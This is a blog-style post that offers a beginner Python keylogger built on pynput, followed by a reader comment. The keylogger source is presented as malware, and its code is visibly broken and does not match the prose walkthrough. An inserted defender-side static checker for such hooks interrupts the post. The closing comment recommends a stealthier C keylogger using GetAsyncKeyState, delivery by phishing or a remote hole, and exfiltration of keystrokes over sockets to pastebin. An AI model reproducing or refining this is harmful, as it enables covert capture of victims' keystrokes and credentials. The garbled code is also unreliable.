Keylogger :- A Basic Malware

Keyloggers are tools that record what a person types on a device. While there are legitimate and legal uses for keyloggers, many uses for keyloggers are malicious. In a keylogger attack, the keylogger software records every keystroke on the victim’s device and sends it to the attacker.

I am a beginner in Python and especially malware development in Windows. So I have made a keylogger for Windows, that is pretty basic, but probably a bit different from others.

*Please note that it was written for EDUCATIONAL PURPOSES.

A keylogger is a tool that can track and record keystrokes, typically used to monitor keyboard activity. It can exist as either hardware or software, but this article will focus primarily on software keyloggers. When a key is pressed, the keylogger captures the input and can send it to its intended destination. Keyloggers may or may not be considered malware, depending on the context in which they are used. For example, parents may use keyloggers to monitor their child’s computer activity, or employers may use them to ensure that employees are following company policies. These types of applications are often referred to as Possibly Unwanted Programs (PUP) or Possibly Unwanted Applications (PUA).

Before starting the program, you have to install the ‘pynput’ library if you haven’t already. You can do this by running the following command in your terminal or command prompt:

pip install pynput

Let’s write the program

import pynput
from pynput.keyboard import Key, Listener

keys = []

def press(key):

        print('alphanumeric key {0} pressed'.format(key.char))
    except AttributeError:
        print('special key {0} pressed'.format(key))

def write_file(keys):
    with open('test.txt', 'w') as f:
        for key in keys:
            # removing ' '
            k = str(key).replace("'", "")

            # every keystroke for readability
            f.write(' ')

def release(key):
    print('{0} released'.format(key))
    if key == Key.esc:
        # stop listener
        return False

with Listener(on_press=press, on_release=release) as listener:

The program starts by importing the necessary modules from pynput.

It initializes an empty list called ‘keys’ to store the captured keystrokes.

The ‘press’ function is defined, which is called whenever a key is pressed. Inside this function, the pressed key is appended to the keys list, and then the ‘write_file’ function is called to save the captured keystrokes to a file.

The ‘write_file’ function takes the keys list as input and opens a file named ‘test.txt’ in write mode. It iterates over each key in the list, removes the single quotes around the key representation (to improve readability), and writes the key value to the file. Additionally, it writes a space character after each key for readability purposes.

The ‘release’ function is defined, which is called when a key is released. Inside this function, it prints the released key. If the released key is the “Esc” key, it returns False to stop the listener and terminate the program.

The program enters a with statement to create a Listener object from ‘pynput’ using the ‘press’ and ‘release’ functions. The listener is responsible for capturing the keyboard events.

The listener starts capturing keyboard events using the listener.join() method. It will keep running in the background and capturing keystrokes until the program is terminated.

When executed, the program will log all the keystrokes in real-time and save them to the ‘test.txt’ file. The program will also print a message indicating whether the pressed key is alphanumeric or a special key.
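
A defender-side view of the structure described above, as an added example that is not part of the original post: a static check that parses Python source with `ast` (nothing is executed) and reports a pynput-style keyboard `Listener` whose callback reaches an `open()` in a writable mode. The function names, the finding format and the embedded sample are assumptions made for this illustration; the sample is constructed and its callback records nothing.

```python
import ast

# Constructed sample with the page's structure; its callback logs nothing. Parsed, never run.
SAMPLE = '''\
from pynput.keyboard import Listener
def write_file(keys):
    with open('test.txt', 'w') as f:
        f.write(' ')
def press(key):
    write_file([])
with Listener(on_press=press) as listener:
    listener.join()
'''

def _opens_for_write(func):
    """True if the function calls open() with a literal mode that can write."""
    for n in ast.walk(func):
        if isinstance(n, ast.Call) and getattr(n.func, "id", None) == "open":
            mode = n.args[1] if len(n.args) > 1 else next(
                (k.value for k in n.keywords if k.arg == "mode"), None)
            if isinstance(mode, ast.Constant) and set(str(mode.value)) & set("wax+"):
                return True
    return False

def find_keyboard_hooks(source):
    """List pynput-style Listener keyboard hooks found in Python source text."""
    tree = ast.parse(source)
    if not any(isinstance(n, (ast.Import, ast.ImportFrom)) and "pynput" in ast.dump(n)
               for n in ast.walk(tree)):
        return []  # no pynput import, nothing to report
    funcs = {n.name: n for n in ast.walk(tree) if isinstance(n, ast.FunctionDef)}
    findings = []
    for n in ast.walk(tree):
        if not (isinstance(n, ast.Call) and
                getattr(n.func, "id", getattr(n.func, "attr", None)) == "Listener"):
            continue
        for kw in n.keywords:  # on_press/on_release are keyboard hooks (mouse uses on_click)
            if kw.arg in ("on_press", "on_release") and isinstance(kw.value, ast.Name):
                seen, todo = set(), [kw.value.id]
                while todo:  # follow plain function calls made by the callback
                    name = todo.pop()
                    if name in funcs and name not in seen:
                        seen.add(name)
                        todo.extend(c.func.id for c in ast.walk(funcs[name])
                                    if isinstance(c, ast.Call) and isinstance(c.func, ast.Name))
                findings.append({"line": n.lineno, "hook": kw.arg, "callback": kw.value.id,
                                 "writes_file": any(_opens_for_write(funcs[f]) for f in seen)})
    return findings
```

Calling `find_keyboard_hooks(SAMPLE)` returns one finding for the `on_press` hook with `writes_file` set. A hit is a triage signal for code review or repository scanning, since the same API is used by legitimate hotkey and accessibility tools.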



I think it would be wiser to make the keylogger a bit more specialized in the sense that it should use the interfaces the OS uses. Not only does that make the program lighter, which is important, but it will also be a lot less obvious what's happening to the victim. I don’t get this parasitic mind-virus of people trying to write everything in a certain language, like Rust or in this case Python in particular. Because how do you employ it in practice? OK, you have a target machine running Windows 10, so you connect to it via a remote hole or get it on through phishing, but how does it run exactly? Most Windows people don’t have a Python interpreter installed and all methods of making exe files from a Python script just result in huge executables. To be fair, the library you mentioned could just be included in the file so you don’t have to install it, but still, it’s extremely impracticable.

There is the Windows.h that is on every Windows machine already preinstalled. Maybe make use of that with a C program. Just interface with Windows.h, get GetAsyncKeyState and log it somewhere. Windows has a socket library that you can use to send all the stuff back to you or somewhere else (pastebin for example).

1 Like
